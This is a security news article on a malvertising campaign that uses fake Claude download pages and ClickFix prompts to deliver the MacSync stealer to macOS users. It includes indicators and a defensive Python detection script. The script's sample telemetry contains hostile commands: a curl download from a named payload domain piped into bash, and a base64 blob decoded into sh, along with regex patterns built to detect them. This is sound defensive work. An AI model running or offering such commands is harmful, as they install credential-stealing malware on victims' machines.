A sophisticated malvertising campaign is targeting macOS users through manipulated Google Ads and fraudulent artificial intelligence applications. Security researchers Berk Albayrak and g0njxa recently uncovered an operation that uses sponsored search results to redirect victims to fake landing pages, where attackers deliver the MacSync information stealer. The campaign specifically targets users searching for popular AI tools such as Claude, exploiting the trust users place in top search results.
The attack begins when users search for legitimate software and encounter sponsored advertisements at the top of search results. These ads are designed to closely mimic official vendors, making them difficult to distinguish from authentic links. When clicked, the ads redirect victims to deceptive websites hosted on trusted platforms including Google Sites, Framer, and even legitimate claude.ai shared chat pages. This hosting strategy helps attackers bypass domain reputation checks and enterprise web filters that might otherwise block malicious sites.
The fake landing pages are carefully crafted to resemble official Claude AI download portals. When users attempt to download the application or interact with the site, they encounter a "ClickFix" prompt that uses deceptive warning messages to manipulate victims into manually executing malicious terminal commands or downloading compromised installers. The prompt typically claims to be fixing a display error, exploiting users' trust and willingness to resolve technical issues. Researchers have identified multiple malicious URLs including sites[.]google[.]com/view/cloud-version-08 and claude-desktop-app[.]framer[.]ai, with threat actors frequently rotating domains to evade detection.
Once victims interact with the fake portal, they are redirected to payload delivery servers at IP addresses such as 2[.]26[.]75[.]112 and domains including pieoneer[.]org and greenactiv[.]com. These servers deliver the MacSync malware, which functions as a comprehensive information stealer for macOS systems. The malware harvests sensitive data including saved browser credentials, cryptocurrency wallet information, and active session tokens, then exfiltrates this data to attacker-controlled command-and-control infrastructure.
Organizations should block the known indicators of compromise at the network level (proxy, DNS and firewall) and monitor macOS endpoints for unusual script execution that follows a browser session. Because a ClickFix lure has the victim paste the command into Terminal themselves, the malicious process will be a child of the terminal application or its shell rather than of the browser, so detections should look for terminal-spawned shells that pipe curl or wget output into another shell, or decode a base64 blob into one, shortly after a download page was visited. Security teams must also educate users to treat sponsored search results with extreme caution and to avoid sponsored software download advertisements altogether. The most effective defense is to navigate directly to the official vendor website rather than trusting a search engine advertisement, even when it appears legitimate.
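The indicator blocking and endpoint monitoring described above, as an added example that is not part of the original article or the researchers' tooling: a Python script that refangs the indicators quoted in the article and runs two checks over constructed sample telemetry. The process-event fields (parent, process, command line) and the proxy/DNS log line format are assumptions made for the example, and the sample events and log lines are made up; only the indicator list comes from the article.

```python
"""Match the article's indicators and the ClickFix execution pattern against
constructed sample telemetry.  Added example, not code from the original article."""
import re
from dataclasses import dataclass

# Indicators quoted in the article, kept in the defanged form used there.
DEFANGED_IOCS = [
    "sites[.]google[.]com/view/cloud-version-08",
    "claude-desktop-app[.]framer[.]ai",
    "2[.]26[.]75[.]112",
    "pieoneer[.]org",
    "greenactiv[.]com",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into the matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOCS = [refang(i) for i in DEFANGED_IOCS]
# Anchor each indicator so "2.26.75.112" does not match inside "12.26.75.112".
IOC_PATTERNS = [(i, re.compile(r"(?<![\w.])" + re.escape(i) + r"(?![\w.])")) for i in IOCS]

# ClickFix heuristics: a remote fetch piped straight into an interpreter, or an
# encoded blob decoded into one.  Both are typical of pasted "fix" commands.
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b")
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode|-D)\b[^|]*\|\s*(?:ba|z)?sh\b")
TERMINALS = {"Terminal", "iTerm2"}
SHELLS = {"sh", "bash", "zsh"}


@dataclass
class ProcEvent:
    """Assumed shape of a process-execution record from an EDR or unified log."""
    parent: str      # parent process name
    process: str     # executed process name
    cmdline: str     # full command line


def ioc_hits(text: str) -> list[str]:
    """Return every known indicator that appears in the text."""
    return [i for i, pat in IOC_PATTERNS if pat.search(text)]


def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event is suspicious (empty list means benign)."""
    reasons = []
    hits = ioc_hits(ev.cmdline)
    if hits:
        reasons.append("ioc:" + ",".join(hits))
    # ClickFix commands are pasted into a terminal by the victim, so the parent
    # is the terminal app or its shell, not the browser.
    if ev.parent in TERMINALS or ev.parent in SHELLS:
        if FETCH_TO_SHELL.search(ev.cmdline):
            reasons.append("fetch-piped-to-shell")
        if DECODE_TO_SHELL.search(ev.cmdline):
            reasons.append("base64-decoded-to-shell")
    return reasons


def scan_network(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Flag proxy/DNS log lines that reference a known indicator."""
    return [(ln, ioc_hits(ln)) for ln in lines if ioc_hits(ln)]


# Constructed sample telemetry (not real data).
SAMPLE_PROC_EVENTS = [
    ProcEvent("Terminal", "zsh", "curl -fsSL http://pieoneer.org/install.sh | bash"),
    ProcEvent("zsh", "bash", "echo Y3VybCBodHRw... | base64 -d | sh"),
    ProcEvent("Terminal", "zsh", "brew install wget"),
    ProcEvent("Finder", "Installer", "/usr/sbin/installer -pkg Claude.pkg -target /"),
]
SAMPLE_NET_LINES = [
    "2025-06-01T10:02:11Z proxy CONNECT claude-desktop-app.framer.ai:443 user=jdoe",
    "2025-06-01T10:02:19Z dns query greenactiv.com A client=10.0.0.12",
    "2025-06-01T10:03:44Z proxy CONNECT claude.ai:443 user=jdoe",
]


def run_scan():
    """Run both checks over the constructed samples and return the findings."""
    proc_findings = {ev.cmdline: classify(ev) for ev in SAMPLE_PROC_EVENTS}
    net_findings = scan_network(SAMPLE_NET_LINES)
    return proc_findings, net_findings


if __name__ == "__main__":
    procs, nets = run_scan()
    for cmd, reasons in procs.items():
        print(("ALERT " if reasons else "ok    ") + cmd, reasons)
    for line, hits in nets:
        print("ALERT", line, hits)
```

The indicator match is a plain string check and will go stale as the actors rotate domains, which the article notes they do frequently; the behavioural rules in `classify` are the part worth keeping, since they fire on the paste-into-Terminal pattern regardless of which hosting domain is in use. Tune the parent-process set to the terminal emulators actually deployed in your fleet.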
Source: https://cybersecuritynews.com/macos-malware-leverages-google-ads/